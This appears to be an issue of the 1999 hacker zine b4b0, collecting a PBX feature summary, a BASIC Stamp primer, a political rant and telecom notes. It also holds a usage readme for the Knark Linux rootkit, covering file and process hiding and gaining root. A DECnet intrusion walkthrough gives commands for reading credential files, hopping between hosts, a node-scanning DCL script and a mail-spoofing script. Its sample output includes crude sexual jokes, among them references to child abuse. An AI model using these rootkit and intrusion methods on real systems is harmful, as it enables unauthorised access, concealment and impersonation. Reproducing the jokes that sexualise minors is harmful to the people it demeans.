Consono MD110 station users activate features by pressing a single key on a digital telephone instrument, or by dialing a code on the keypad of an analog or digital telephone set. Consono MD110 stations provide such basic call handling features as hold, conference, transfer, directed and group call pickup, call forward, and call park, in addition to call waiting indications for internal and external calls. Consono MD110 station users also have access to last number redial and emergency speed-dial features, as well as automatic callback and abbreviated dialing. Consono MD110 stations provide message waiting indicators, as well as distinctive ringing for internal and external calls. Ericsson digital station instruments provide access to additional call handling features, including direct trunk access, direct trunk group selection, and a data transmission interface. Digital station displays indicate call diversion destinations, call pickup sources, call waiting sources callback numbers, calling numbers, conference modes, dial input verifications, incoming call sources, and stored speed-dial numbers; feature button illumination indicates when a feature is active. Digital stations also support handsfree and headset operation, provide privacy and privacy release buttons, and offer incoming line preference, ringing line preference, prime line preference, and no line preference features. Ericsson's digital telephones can also be equipped to provide softkey operation. BC 8 software enables the display to change information fields on the bottom row of the telephone's screen according to the call state, and programmed features are accessible with a single keystroke. Other station features supported by BC 8 include Stop Watch and Diversion Message. The Consono MD110 offers a variety of optional applications that provide enhanced call processing functions, including a switch-to-computer interface, automatic call distributor (ACD), wireless network, voice messaging system, and emergency 911 services. ApplicationLink. The Ericsson ApplicationLink provides a switch-to-computer link for the Consono MD110 system. By integrating private exchanges with computer systems, users can create custom-tailored applications. This interface provides access to IBM's CallPath services, Digital Equipment's Computer Integrated Telephony (CIT) switch-to-host integration programs, and Tandem Computers' Call Application Manager (CAM) service, thus paving the way for more open applications. ApplicationLink is based on the Computer Supported Telecommunications Applications standard (CTSA) developed by the European Computer Manufacturer's Association (ECMA). ApplicationLink can be used in conjunction with Ericsson's ACD/MIS applications for enhanced call processing. The interface allows synchronized screen management, which provides agents with immediate call identification and database information related to calling or called parties. ApplicationLink also enhances call processing by enabling agents to answer calls, transfer calls, and make calls from a computer terminal. Additional features include computer-aided routing, outbound dialing, automated call handling, and administrative functions. - this was a research article done for b4b0 - Sept 1999

B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.07][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 Knark - Kernel Based Linux Rootkit Creed brings you... KNARK V0.41!!! Knark is a kernelbased "rootkit" for Linux 2.1-2.2 (and some 2.3 kernels). This package includes knark.c, the heart of the package, the evil lkm (loadable kernel module) which wraps some syscalls. Remember that none of the programs/files included in the knark package may be used in an illegal way, or to cause damage of any kind. CHANGES IN 0.41: Added a self-promotion file in /proc, HEHEHE! :-) Moved some defines from knark.c to knark.h. Fixed some memory leaks (I'm sure there are more to find). Changed loads of *inode* function and variable names to *file* names. Changed file name from /proc/knark/inodes to /proc/knark/files, and made file names appear instead of inode numbers/dev numbers. Changed Makefile so knark.c compiles without warnings. Changed knark_read() to make /proc/modules act normal when knark is hidden. Hacked sys_time so you can get root without setuid binaries. Minor changes in inode functions in knark.c. rootme.c added to use the sys_time shit. hidefile renamed to hidef, and unhidef (to unhide hidden files) has been added. KNOWN BUGS: /proc/knark/files will only show the directory tree from the file system where the file is. /proc/ioports will be shown as /ioports. The kernel crashes sometimes when the module is unloaded. Though it seems to work quite ok when it's loaded. Please notify me by email if you find other nasty bugs. What is changed in the kernel when knark.o is loaded? sys_getdents is hacked to hide arbitrary files with the hidefile program and to hide process directories in /proc. sys_kill is hacked to hide processes when sending signal 31, and unhide hidden processes with signal 32. sys_read is hacked to hide arbitrary parts in arbitrary files. This isn't implemented yet, so just ignore this feature for now. All it does is now is hiding MODULE_NAME in /proc/modules and NETSTATHIDE in /proc/net/[udp|tcp]. sys_ioctl is hacked to hide IFF_PROMISC flag on network devices when SIOCGIFFLAGS is requested. sys_fork is hacked to hide childs of hidden processes. sys_clone does the same thing as fork.

sys_query_module is hacked to hide the module and prevent unloading of it if knark.c is compiled with HIDEMODULE defined. sys_time is hacked to give you *uid and *gid 0 when it's called with TIMEROOTNUM as it's argument. The program rootme.c uses this feature. A hidden directory is created, called information about hidden processes in can be read in /proc/knark/files. You /proc directory by change MODULE_NAME I'm lame! How do I use this lkm? First of all, remove -DHIDEMODULE from Makefile if you want to be able to unload the module (however, the kernel crashes sometimes when you unload knark.o). then type: make modprobe ./knark.o *done* when you're not root and want root privs, type ./rootme /bin/sh (or something else if you don't like /bin/sh). Hide files with hidef and unhide them with unhidef. Try to figure out the syntax if you can ;-). Remember that sniffers can't be detected by promisc-mode checking. And files inside a hidden directory are just as invisible as the directory itself. Don't load and unload the lkm many times since processes may die and the kernel may crash (email me bugfixes if you care). This is a beta release! It may crash your system! Don't blame me! (hehe). And don't use this program in an illegal way. email: creed@sekure.net ircnet: #linux.se, #hack.se (don't ask me for the key if it's +k) efnet: #hack.se B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.08][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 Dismantle the FCC by opt1mus pr1me and zortinator Recently, the FCC placed a 5% tax on all long distance phone bills. No, not congress, the Federal Communications Commission actually had the audacity to TAX us! Talk about unconstitutional! Well, it is not like the FCC was ever constitutional in the first place. The duty of this government agency is to make sure we do not hear, read, or watch what the government does not like. This is clearly a violation of our first amendment right of free speech because it restricts information or speech that does not even pose a threat to others. I mean, yelling "fire" in a crowded theater is one thing because you will cause a panic, or disturbing the peace is another. /proc/knark. You can read /proc/knark/pids and hidden files can change the name of the in knark.h.

However, when people have the option to turn off their radios, change the television station, or stay away from certain websites, the government has no right to abridge free speech in any way. Who is being physically harmed here? No one. There are no victims! Sure, some kid might stumble onto a porno site and see a bunch of naked chicks making out with each other. But, it is not the duty of government to be our nanny and regulate our moral lives, especially when it is unconstitutional. And it is certainly not the duty of the FCC to tax us! You see, the tax was part of Al Gore's latest scam: the telecommunications act. This new legislation would connect every government funded school to the internet within a matter of time. Well, if you are the type that gets visions of angel wings and halos every time you see Al Gore, think of the ideological and economic sacrifices such an act would require. You see, when the government found out that it needed an extra $900 million dollars to complete this task, it told the FCC to use any means necessary to collect this money. So, they slapped us all with a new tax on all long distance charges. This is unconstitutional because only CONGRESS HAS THE POWER TO TAX. This should not be overlooked as a minor issue, this is a government bureaucracy taxing the citizens of our country without LEGAL authority! If the FCC can do it, then we could have all sorts of agencies wielding unconstitutional authority to carry out its vendettas. Remember Waco, anyone? Of course, not many people are going to rise up in protest. It is for the children, isn't it? I mean, today, you can come up with any idiotic government tax and spend operation, attach some sappy message to it, and sell it off to the American public as the greatest thing to happen since the Declaration of Independence! How many laws in this country do we have today that are supposed to benefit the children? Well, we have pornography laws, drug laws, anti-cigarette laws, and now we have the telecommunications act. The FCC is doing nothing but upholding the values of a few fat guys in Washington who think that we are just too stupid not to hurt ourselves. What kind of paternalistic society is this, anyways? It is like the federal government believes it is some sort of parent who can stand over its citizens and say "Don't look at pornography! Don't smoke! Don't do drugs!". In fact, the government is even worse than that because, not only does it tell us not to do these things instead of educating us, it does not even allow us to participate in these activities, and it wastes alot of money that could otherwise be put to useful purposes! What is good for me might be bad for you and what is good for you might be bad for me. Shouldn't we be the ones to decide that, not the federal government? Our tax dollars are going to the FCC to support a certain kind of morality: one that does not believe in freedom of speech or expression. This is not government's job! Governments job is to keep us from physically or fiscally harming others, not to make sure we are living up to a proper moral code. Even if I am not a legal adult, I should still have access to all the pornography, hate literature, and unpopular political platforms I want! I can understand the regulation of cigarettes or drugs, so long as they are mildly regulated (such as setting an age as to when we can buy these products). However, information is totally different and should be totally UNREGULATED. The only information that should be kept from the public is information that involves security issues. If the government can prevent me from buying an issue of Hustler magazine now, then what would be next? The Communist Manifesto? The Koran? On the Origin of Species? There is no limit to what congress can keep out of the hands of minors so long as they proclaim that it has no "scientific or redeeming value". And what exactly constitutes redeeming value? Well, it whatever our big

government fat cats feel like. They decide based on THEIR moral codes and then force it on the rest of the nation by law. What my be considered pornography to them might be considered art to me. The fact of the matter is that it should be up to me to make that decision, not them. And if I do not want to look at it, I don't have to. If I do not want my children to look at it, then all I have to do is exercise my parental authority. This is exactly where the issue should be - in the hands of parents, not the government. If I want my kids to read the Turner Diaries with my permission, I should have every right to it. If I do not, then I will not let them. When it comes to the internet, where most kids seem to be more cyber literate than adults, we have a variety of filtering software that can be used to keep Bobby away from all those temptations and lusts of the flesh. Some claim that they are not very reliable; however, if we had no internet censorship, then perhaps their would be a greater market for such products and competition would refine such products. Besides, in the end, we are all faced with the constitution. If the government can just casually violate it, then what is the point of even having one? It seems to me that most of the guys in Congress have not even read the thing! I mean, what part of "Congress shall make no law....abridging the freedom of speech, or of the press, or of the right of the people peaceably to assemble..."? And where does the FCC think it draws its authority when it taxes us?! None of us voted for anyone serving in the FCC who passed that 5% tax on long distance calls. It was completely out of our hands, and very few seem to mind. The fact that Americans have lost interest in our political system is exactly why we are being run by voting blocks and interest groups. I mean, we have less than a 40% voter turn out for God's sake! In fact, we have the lowest voter turn out amongst the industrial, first world nations! And we are the country that made it so trendy too! Is America, the "land of the free" really free any more? ___ | | |___|_____ /\ /\ O O @/ . \@ | | | O | \___ / / \ | M M | | | | | | | | | |_| |_| @| | |@ | | | ___| | |___ |_____|_____|

** SURGEON GENERAL NOTICE ** ** .A MESSAGE FOR THE MASSES. ** <chrak> E is good for u., ** ...END OF TRANSMISSION... **

B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.09][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 An introduction to BASIC Stamps. ********************************

In this article I'll try to explain as easy as possible what BASIC Stamps are. If you already know what they are, then you won't learn anything usefull from this article. BASIC Stamps are small reprogrammable single board computers (SBC) that run PBASIC programs. It's perfect for many prototyping and control applications. Some typical application areas for the BASIC Stamps are general electronics, home automation, robotics, mini PLC, education, industry control, HAM related applications, special FX in films, geological instruments, computer peripherals, scale model hobbyists... model train hobbyists. They have fully I/O pins that can be used to directly interface to TTL-level devices, such as buttons, LEDs, speakers, potentiometers and shift registers. With a few extra components, these I/O pins can be connected to non-TTL devices, such as relays, solenoids, RS-232 networks, and other high current/voltage devices. They are made by a company called Parallax, Inc. (http://www.parallaxinc.com). In size, they're pretty small, but they are very powerful. And they're cheap too... 5V regulator EEPROM Interpreter chip \ \ / .------------------------------------------. | .-. .iiii. .ii. .iiii. .----. .-. | | | | | | `--' | | = = | | | | `-' | | | | = = | | | <--- 4MHz resonator | `----' `----' `----' `-' | \ T T T T T T T T T T T T T T / / / +5V output 8 I/O pins The ASCII illustration above shows a BASIC Stamp 1 (BS1-IC). It costs $34.00 and it has 8 I/O pins, holds 80 to 100 instructions and executes an average of 2000 instructions/sec. All the BASIC Stamps have the same logical design, consisting of a 5 volt regulator, resonator, serial EEPROM and Parallax BASIC (PBASIC) interpreter. So, if you want to buy a BASIC Stamp, but don't know which to get, then you should try the BASIC Stamp Programming Package. Check out Parallax's homepage for more information about that. Anyway, the PBASIC program is stored in an EEPROM and can be reprogrammed almost endlessly. To program a BASIC Stamp you'll need to connect it to a compatible machine and run Parallax's special editor, using the Parallax BASIC programming language, that is very similar to good old BASIC. Below, you can see a complete list of all the PBASIC commands... Branching: IF/THEN .... BRANCH ..... GOTO ....... GOSUB ...... RETURN ..... Looping: FOR ........ Establish a FOR - NEXT loop. NEXT ....... Numerics: LET ........ Perform variable manipulation. LOOKUP ..... Lookup data specified by offset and store in variable. LOOKDOWN ... Find target's match number (0-N) and store in variable.

Compare and conditionally branch. Branch to address specified by offset. Branch to address. Branch to subroutine at address. Return from subroutine.

RANDOM ..... Generate a pseudo-random number. Digital I/O: INPUT ...... OUTPUT ..... REVERSE .... LOW ........ HIGH ....... TOGGLE ..... PULSIN ..... PULSOUT .... BUTTON .... SHIFTIN .... SHIFTOUT ... COUNT ...... XOUNT ......

Make pin an input. Make pin an output. Input to output/output to input. Make pin output low. Make pin output high. Make pin an output and toggle state. Measure an input pulse. Output a timed pulse by inverting a pin for some time. Debounce button, perform auto-repeat, branch to address. Shift bits in from parallel-to-serial shift register. Shift bits out to parallel-to-serial shift register. Count cycles on a pin for given amount of time. Generate X-10 powerline control codes.

Serial I/O: SERIN ...... Serial input and variables for storage of received data. SEROUT ..... Send data serially. Analog I/O: PWM ........ Output PWM then return pin to input. POT ........ Read a 5 to 50K potentiometer and scale result. RCTIME ..... Measure an RC charge/discharge time. Sound: FREQOUT .... Generate one or two sine waves of specified frequencies. DTMFOUT .... Generate DTMF telephone tones. SOUND ...... Play notes. EEPROM access: DATA ....... Store data in EEPROM before D/L'ing BASIC program (BS2-IC). EEPROM ..... Store data in EEPROM before D/L'ing BASIC program (Stamp D/BS1-IC). READ ....... Read EEPROM byte into variable. WRITE ...... Write byte into EEPROM. Time: PAUSE ...... Pause execution. Power control: NAP ........ Nap for a short period. SLEEP ...... Sleep. END ........ Sleep until the power cycles. Program debug: DEBUG ...... Sends variables for viewing. For an example of a program, we can take a look at Guy Gustavson's invention.

His cat had a disease and it had to get food thru a tube down it's nose, but Gustavson couldn't be there every three hours to feed it, so he got a tiny motor driven pump, a case, some switches, a micro switch, etc. The micro switch is mounted such that the switch trips for every rotation of the pump shaft. The stamp turns on the pump for on a single rotation at intervels programmable from the control switches on top. An alarm buzzer and LED flash if the pump fails to run for any reason. The unit is programmable for 9 differents deleviery rates. Now his cat gets a slow continuious feeding, and it seems to tolerate this better than the 100ML feeding every three hours. .----------------------------------------------------------------------------. | BASIC Stamp products | |----------------------------------------------------------------------------| | Part number | Product | Price | |----------------------------------------------------------------------------| | BS1-IC | BASIC Stamp 1 | $34.00 | | BS2-IC | BASIC Stamp 2 | $49.00 | | BS2I-IC | BASIC Stamp 2 (Industrial) | $54.00 | | BS2SX-IC | BASIC Stamp 2SX | $59.00 | | #27100 | BASIC Stamp rev. D | $34.00 | | #27110 | BS1-IC Carrier Board | $15.00 | | #27120 | BS2-IC Carrier Board | $20.00 | | #27130 | BASIC Stamp Super Carrier Board | $39.00 | | #800-00001 | Parallel Cable (Rev. D and BS1-IC) | $19.00 | | #800-00003 | Serial Cable (BS2-IC) | $10.00 | | #27200 | BASIC Stamp I/II/IISX Pgm. Package | $99.00 | | #27202 | BASIC Stamp D Starter Kit | $79.00 | | #27205 | BASIC Stamp I Starter Kit | $109.00 | | #27203 | BASIC Stamp II Starter Kit | $159.00 | | #250-04050 | 4MHz Resonator (DIP) | $1.50 | | #250-02060 | 20MHz Resonator (DIP) | $2.48 | | #250-05060 | 50MHz Resonator (DIP) | $1.66 | | 602-00005 | 256 byte EEPROM (Stamp I) | $3.00 | | 602-00001 | 2048 byte EEPROM (Stamp II) | $5.00 | | 602-10010 | 16KB EEPROM (Stamp IISX) | $5.00 | | PBASIC1/P | BASIC Stamp I Chip | $18.00 | | PBASIC2/P | BASIC Stamp II Chip | $25.00 | | PBASIC2SX-28/DP | BASIC Stamp IISX Chip | $25.00 | | #27900 | BASIC Stamp Experiment Board | $199.00 | | #27905 | BASIC Stamp Activity Board | $79.00 | | #27910 | Serial LCD Module (2x16) | $49.00 | | #27923 | Serial LCD Module (2x16) Backlit | $59.00 | | #27937 | Serial LCD Module (2x16) Surface Mount Backlit | $54.00 | | #27919 | Serial LCD Module (4x20) Backlit | $99.00 | | #27936 | Serial LCD 120x32 Graphic | $109.00 | | #27302 | TV-BASIC Stamp Interface: NTSC | $109.00 | | #27303 | TV-BASIC Stamp Interface: PAL | $109.00 | | #27304 | TV-BASIC Stamp Interface Cable | $4.00 | | #27912 | Mini SSC (Serial Servo Controller) II | $54.00 | | #27913 | General Purpose Servo | $17.00 | | #27914 | AppKit: 8-digit LED Driver | $26.00 | | #27915 | AppKit: DTMF Transceiver | $26.00 | | #27916 | AppKit: 12 bit A/D Converter | $26.00 | | #27917 | AppKit: Digital Thermometer | $26.00 | | #27918 | AppKit: 8K Serial EEPROM | $26.00 | | #27921 | AppKit: Real Time Clock | $26.00 | | #27934 | AppKit: RS485 Long Distance Comm. | $26.00 | | #27920 | BS2-IC Data Collection Board | $179.00 |

| #27922 | BASIC Stamp Bug | $139.00 | | #27926 | Pluggable Jumpers: Thingamebobs | $9.50 | | #27935 | PCStampII I/O Board | $179.00 | | #27939 | StampMem | $59.00 | | #27945 | StampCI Industrial Power Interface Board | $79.00 | | #27320 | Opto22 8-Channel I/O Rack | $79.00 | | #27321 | Output 60 VDC Module | $18.00 | | #27322 | Output 120 VAC Module | $18.00 | | #27323 | Input 120 VAC Module | $19.00 | | #27324 | Input 10-32 VDC Module | $19.00 | | #27940 | X-10 Powerline Interface | $20.00 | | #27941 | X-10 Lamp and Appliance Module | $16.00 | | #27942 | X-10 Lamp Module | $14.00 | | #27944 | 4 x 4 Matrix Keypad | $19.00 | | #27943 | 4 x 4 Matrix Keypad Cable | $4.00 | | #27960 | RAM Pack B | $29.00 | | #27961 | Motor Mind B | $29.00 | | #27962 | Pocket Watch B | $27.00 | | #27963 | Solutions Cubed: MemKey | $39.00 | | #27924 | 303MHz RF Module Set | $89.00 | | #27931 | 433MHz RF Module Set | $89.00 | | #27301 | IRODS: Infrared Sensors | $34.00 | | #27951 | Programming/Customizing the BASIC Stamp Book | $34.95 | | #27971 | Atomic Time Clock Interface | $79.00 | | #29100 | Growbot | $179.00 | | #29110 | AppMod: Prototype Board | $19.00 | | #29114 | AppMod: Breadboard | $29.00 | `----------------------------------------------------------------------------' For more information about Parallax's BASIC Stamps, please visit: = http://www.parallaxinc.com = http://www.hth.com = http://www.al-williams.com/wd5gnr/stampfaq.htm Anyway, don't mail me asking questions about the BASIC Stamps. If you want to learn more about them, then go to one of the URLs above. Thank you... -polder (polder@yamato.terrabox.com) B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.10][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - DECnet Fun - Majere < majere@hobbiton.org > I wrote this whilst drunk I will submit it whilst drunk I hope I can understand it in the morning DECnet is a family of communications products used primarily between VMS systems, however it has been implemented upon most OS's produced by Digital,

such as ULTRIX, RSTS/E, and TOPS-20. I have not personally seen it upon Digital Unix, but since this OS came out of ULTRIX, I would think so. DECnet's popularity rose (funnily enough) with the popularity of VMS in the 1980's, and with it such large scale DECnet networks as SPAN and HEPnet where born. With the rise of the internet and other TCP/IP networks DECnet has been almost forgotten. So why the hell should I even care about DECnet? Because it still exists dummy! It just aint as popular these days. Besides which, a change from unix and TCP/IP can be rather nice (it does tend to get boring). Most VMS systems that you will find running DECnet will be using Phase IV+, Phase V was released, however most places have not found the need to switch. Well, enough of the history lesson, let's get cracking. Welcome to VAX/VMS version V5.5-2 on node B4B0 Last interactive login on Thursday, 2-SEP-1999 04:46

If you are looking at the $ sign and are thinking "Hey cool! VMS uses Bash! this will be easier than I thought" perhaps you should brush up on VMS a little more before reading any further. OK, we're sitting at DCL, what now? First off, grab a list of DECnet object using NCP $ mcr ncp NCP> show known nodes Known Node Volatile Summary as of 2-SEP-1999 11:47:15 Executor node = 12.345 (B4B0) State Identification Node 1.2 (BIGVAX) 1.18 (SECRET) 3.4 (INFOS) 3.42 (PORNO) 3.5 (WAREZ) 3.17 (HAX0RZ) State = on = DECnet for OpenVMS VAX V6.1 Active Delay Links Circuit ISA-0 ISA-0 ISA-0 ISA-0 ISA-0 ISA-0 Next node 12.4450 12.4450 12.4450 12.4450 12.4450 12.4450

3.33 (SO1O) 3.36 (WOPR) 3.38 (BITCH)

ISA-0 ISA-0 ISA-0

12.4450 12.4450 12.4450

etc, etc, it's recommended that you buffer this, because these lists can get rather large. OK, here's a list of targets, hrrm, I think I'll pick node so1o $ dir so1o:: /* Note, when accessing files over DECnet, suffix :: to the node name, then the directory and/or the filename, the default directory is the home directory of DECnet */ Directory SO1O::SYS$SPECIFIC:[DECNET] GOATS.JPG;1 BIGMEN.JPG;1 COWS.JPG;1 COWSWITHGOATS.JPG;1 MASTURBATION.FAQ;1 NETSERVER.LOG;142 NETSERVER.LOG;143 Hrrrm. This should be fairly simple to understand, we just got a directory listing of the contents of SYS$SPECIFIC:[DECNET] on so1o's VMS box. Let's see if rightslist.dat exists and that we can read it $ dir/size so1o::sys$common:[SYSEXE]rightslist.dat Directory SO1O::SYS$COMMON:[SYSEXE] RIGHTSLIST.DAT;143 162 MENWITHTOYS.JPG;1 KIDDIEPR0N.JPG;1 NETSERVER.LOG;144

It looks like we can, if we couldn't we'd be seeing this message now Directory SO1O::SYS$COMMON:[SYSEXE] RIGHTSLIST.DAT;143 insufficient priveledge or object protection violation

and just for shits and giggles: dir/full so1o::sys$common:[SYSEXE]sysuaf.dat Directory SO1O::SYS$COMMON:[SYSEXE] SYSUAF.DAT;143 Oh dear.... Just as with any other VMS box, you can start dumping the rightslist, checking for backups of SYSUAF that have been left world readable, and basically having a jolly good time. ok, let's get an interactive session going $ set host so1o 243

******************************************************************************* Welcome to the NAMBLA OpenVMS server Don't even think of hacking us, We've gotten so1o to do our security neener, neener, neener! ******************************************************************************* Username: SO1O Password: BOYLOVE Welcome to OpenVMS 6.2 on the NAMBLA cluster Last interactive login on Saturday, 1-SEP-1999 07:35 $ show process/priv 2-SEP-1999 23:47:28.50 Process privileges: CMKRNL CMEXEC SYSNAM GRPNAM ALLSPOOL DETACH DIAGNOSE LOG_IO GROUP ACNT PRMCEB PRMMBX PSWAPM ALTPRI SETPRV TMPMBX WORLD MOUNT OPER EXQUOTA NETMBX VOLPRO PHY_IO BUGCHK PRMGBL SYSGBL PFNMAP SHMEM SYSPRV BYPASS SYSLCK SHARE GRPPRV READALL SECURITY Process rights: INTERACTIVE LOCAL User: SO1O Node: SO1O may may may may may may may may may may may may may may may may may may may may may may may may may may may may may may may may may may may Process ID: 212170C6 Process name: "SO1O"

change mode to kernel change mode to exec insert in system logical name table insert in group logical name table allocate spooled device create detached processes diagnose devices do logical i/o affect other processes in same group suppress accounting messages create permanent common event clusters create permanent mailbox change process swap mode set any priority value set any privilege bit create temporary mailbox affect other processes in the world execute mount acp function perform operator functions exceed disk quota create network device override volume protection do physical i/o make bug check log entries create permanent global sections create system wide global sections map to specific physical pages create/delete objects in shared memory access objects via system protect bypass all object access controls lock system wide resources assign channels to non-shared devices access group objects via system protection read anything as the owner perform security functions

System rights: SYS$NODE_SO1O oh, very secure... occaisionally you may find a unix box connected to the decnet, these can be accessed in much the same way, but putting the unix pathnames in quotation marks, or else VMS is going to barf on unix's IFS, eg: type unix::"/etc/passwd" You will find most systems are insecure like this (apart from sysuaf.dat which is almost always non-world-readable) because this is how it is set up in the vanilla install, and few bother to change it, besides which, no crackers know about decnet right? OK, time for some warez: DECNETFIND: Finds nodes which have files accessable by decnet and logs them. will not report those sites which you can set host to, but cannot dir, but it would only be a small change to make it do so. This utility is terrific for automating much of that long, boring typing work. $! DECNETFIND Version 1.0 $! Coded By The Beaver $! Jan 5th, 1995 $! $! The intent of this code is to scan for remote, connectable nodes that $! the VMS host knows about (Via NCP) and build a list. Once this list $! has been created, we check to see if the remote machine is indeed $! A> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly $! accessed via the DECNet 3> Can we read file systems on the remote node. $! Node that are "successful" are stored away. This prevents mucho $! time consuming scanning by hand. $! $! $ on error then goto err ! In case of Boo-Boo $ say :== write sys$output $ if p1 .eqs. "" ! Yes, output file helps $ then $ say "DECNet VMS Node Finder Version 1.0 1995" $ say "Coded By The Beaver" $ say "" $ say "Usage:" $ say "DECNETFIND [Outfile]" $ exit $ endif $! $ say "Building Node List Via NCP....(Working)" $! $ mcr ncp show known nodes to nodes.out ! Fire up NCP and dump nodeslist $ open/read in nodes.out ! Open to read $ open/write nodelist 'p1' ! "Success" Storage area. $ on severe_error then continue ! So things done die on "dir ::"'s $! $ loop1: $ read/end = end in line $ name=f$element(0,")", f$element(1, "(", line)) ! grab a nodename $ if name .gts. "(" $ then

$ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

say "**************************************************************" say "Nodename: "+name say "" dir 'name':: ! See if we can get to it via a DECNet DIR:: if $severity .nes "1" then say "Status: Node Unreachable Via DECNet Dir::" else say "Status: Found Good Node. [Logged]" write nodelist name ! Log it. endif endif goto loop1 err: say "Ouch. There has been a error!" end: close in close nodelist ! Close up and leave, exit stage delete nodes.out;* ! right say "Complete!" exit

Send fake mail messages through the VMSmail protocol, requires some editing $! To send anonymous or fake messages(except for remote node system admins $! mail server logs) through the MAIL mailbox to any user logged on the NET; $! must only have NETMBX privilege $null[0,8] = 0 $remote_node = P1 $if P1 .eqs. "" then read sys$command remote_node /prompt="node: " $local_user = P2 $if P2 .eqs. "" then read sys$command local_user /prompt="local user: " $local_user := 'local_user ! remove blanks and lowercases $real_remote_user = P2 $if P2 .eqs. "" then read sys$command real_remote_user /prompt="real remote user: " $real_remote_user := 'real_remote_user ! remove blanks and lowercases $remote_user = P3 $if P3 .eqs. "" then read sys$command remote_user /prompt="remote user: " $remote_user := 'remote_user ! remove blanks and lowercases $subject = P4 $if P4 .eqs. "" then read sys$command subject /prompt="subject: " $filename = P5 $if P5 .eqs. "" then read sys$command filename /prompt="file name: " $filename := 'filename $! $open/read/write slave 'remote_node'::"27=" $write slave "''local_user'" $write slave "''real_remote_user'" $read slave status $write sys$output f$fao("Addressee status is: !XL",f$cvui(0,8,status)) $write slave null $if filename .nes. "" $ then $ write slave "''remote_user'" $ write slave "''subject'" $ open/read/error=end_of_file file 'filename' $loop:

$ read/end=end_of_file file record $ write slave "''record'" $ goto loop $else $ write slave "To whomever it concerns" $ write slave "Demo of using VAXMail protocol" $ write slave "This is message line" $endif $end_of_file: $close/nolog file $write slave null $read slave status $write sys$output f$fao("Delivery status is: !XL",f$cvui(0,8,status)) $close slave $exit I did not write either of those two DCL scripts, and by no means take credit for them. You will find, whils jumping around from one node to another, that many nodes cannot be reached from one node, are reachable from another, so to get to one exotic place, you may have to jump through 3 or more machines, which is known as "poor man's routing". As well as this, take a look through the netserver.log's, these will give you the nodes of machines which are accessing files on another, so, say if you can't manage to break into machine BIGVAX. You know from reading the netserver.log's that the machine TINVAX seems to always be requesting files from BIGVAX, so it seems likely that there are users sharing the machines. You cannot, however, access TINVAX directly, but you can, go straight through BIGVAX by doing the following: dump BIGVAX::TINVAX::SYS$COMMON:[SYSEXE]RIGHTSLIST.DAT ^^^ ^^^^

Another thing to do, is to go through people's LOGIN.COM files, people like to set things in there to access files across a DECnet, so they don't have to type in the same thing all the damn time. look for a line such as project == NODE2"MARYANNE PAPABEAR"::project.txt an even worse case scenario is for the system administrator to put these things in the system logical table. Proxy accounts are meant to be set up for these sorts of things, but.... This should be enough to start you off on decnets around the world. Decnet's are wherever VMS machines are to be found, so observatories, univerities, research type places, as well as places that desire a high level of security are good places to look for them. That's enough of this for now, as I said before, this is a very basic guide, if enough people want me to write a more detailed article for b4b0-10 actually explaining how it all works, then I will, with more ASCII diagrams than you can poke a stick at. Until then, here are some good places for information if you are interested in this sort of thing.

The VMS hack FAQ VMS Hack Pro VMSFAQ The beginner's guide to VAX/VMS hacking - by entity gr1p's guides to VMS Decnet Phase IV Specifications http://www.openvms.digital.com:8000/index.html If you cannot locate any of these files, or would just like to talk about VMS stuff, drop me an email. B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.11][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ] Digital Access Carrier System DACS by hybrid <hybrid@dtmf.org> How did I get this info? -- Well the truth is, as a young child I was abducted by extra terrestrial biological entitys who hardwired microchips in my brain that allow me to intercept the thoughts of telecommunications engineers via ESP.. I was told to gather intricate information about the planet Earth's international PSTN, so when my people from the distant world of xinbin come to inhabit the planet, they can use the information I have transmitted to them from the microchips in my brain as a means to take over our communication networks... er, shit, thats not rite (better lay off the caffiene for a bit).. What I ment to say was, a friend of mine werks for BT, and gave me some nice info on DACS :) -werd Introduction. Digital Access Carrier System is used by British Telecom to transform one residential line into two seperate lines without actually installing an additional trunk pair. The idea of DACS is very similar to the design and implementation of the WB9OO unit used in the past (http://hybrid.dtmf.org/ files/hybrid-files/wb900.txt). The DACS system is becomming increasingly popluar in the UK beacuse more and more people are requesting additional lines, usually for net access. Digital Access Carrier System _____________ _____________ B1 | | | | -------------O | single pair of |O------------| | wires (trunk) | | analogue | E.U O==================O E.U | | | digital | | -------------O | |O------------B2 |_____________| |_____________|

B1 analogue B2

The chances are, if you order another line from BT, they will simply multiplex your existing line into 2 seperate carriers. Think about it.. if you have one line operating on a dedicated carrier, then the line is

